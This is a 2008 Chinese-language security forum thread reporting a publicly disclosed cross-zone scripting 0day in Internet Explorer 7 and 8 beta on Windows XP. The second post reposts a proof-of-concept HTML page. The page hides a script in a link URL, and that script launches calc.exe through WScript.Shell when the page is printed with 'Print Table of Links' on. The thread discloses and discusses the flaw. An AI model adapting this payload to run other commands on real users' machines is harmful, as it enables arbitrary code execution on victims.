Internet Explorer 7/8b 0day攻击代码出现 - 网络安全 - 51CTO技术论坛

社区导航: 专家门诊网络技术操作系统数据库程序设计系统应用考试认证 CIO及信息化站长交流综合交流下载基地 51CTO产品服务

【设为首页 | 收藏本站】

51CTO技术论坛» 网络安全 » Internet Explorer 7/8b 0day攻击代码出现 [ 打印] [ 订阅] [ 收藏] [ 推荐给朋友] [ 本帖文本页]

论坛跳转:

SimpleLove
副版主

帖子 1918
精华 7
无忧币 7043
积分 5710
阅读权限 140

注册日期 2006-1-11

最后登录 2008-7-4

离线

[查看资料] [发短消息] [Blog]

发表于:2008-5-17 13:08　　标题：Internet Explorer 7/8b 0day攻击代码出现
＜上一帖 | 下一帖＞

安全研究人员Nate McFeters公布了一个IE7/8 Beta的0day漏洞,这一漏洞对XP有效,属于跨区域脚本漏洞,主要发生于本地区域和Internet区域的网页读取时.
目前这一漏洞没有被修补,并可以影响许多程序,包括Azureus,uTorrent,Eclipse平台等.

查看:Aviv Raff drops an 0-day for IE 7.0 and 8.0b on XP

好好学习，天天向上

2008-5-17 13:08

1楼

[ 顶部 ]

SimpleLove
副版主

帖子 1918
精华 7
无忧币 7043
积分 5710
阅读权限 140

注册日期 2006-1-11

最后登录 2008-7-4

离线

[查看资料] [发短消息] [Blog]

发表于:2008-5-17 13:14　

MS Internet Explorer "

rint Table of Links" Cross-Zone Scripting Vulnerability
具体细节:http://aviv.raffon.net/2008/05/14/InternetExplorerQuotPrintTableOfLinksquotCrossZoneScriptingVulnerability.aspx

如果启用了 "

rint Table of Links"，在打印一个网页的时候，能够导致执行任意代码，当然VISTA上UAC可以拦截它

重现：
1.下面这个地方打上勾

2.把下面代码保存成HTML，用IE打开，打印之，calc.exe会弹出。（也可以直接访问http://raffon.net/research/ms/ie/print/linksrce.html）

CODE:

[Copy to clipboard]

<html>
<body>
Print me with table of links to execute calc.exe
<a href="http://www.bla.com?x=b<script defer >var x=new ActiveXObject('WScript.Shell');x.Run('calc.exe');</script>a.c<u>o</u>m"></a>
<script>window.print();</script>
</body>
</html>

好好学习，天天向上

2008-5-17 13:14

2楼

[ 顶部 ]

hackersea
新新人类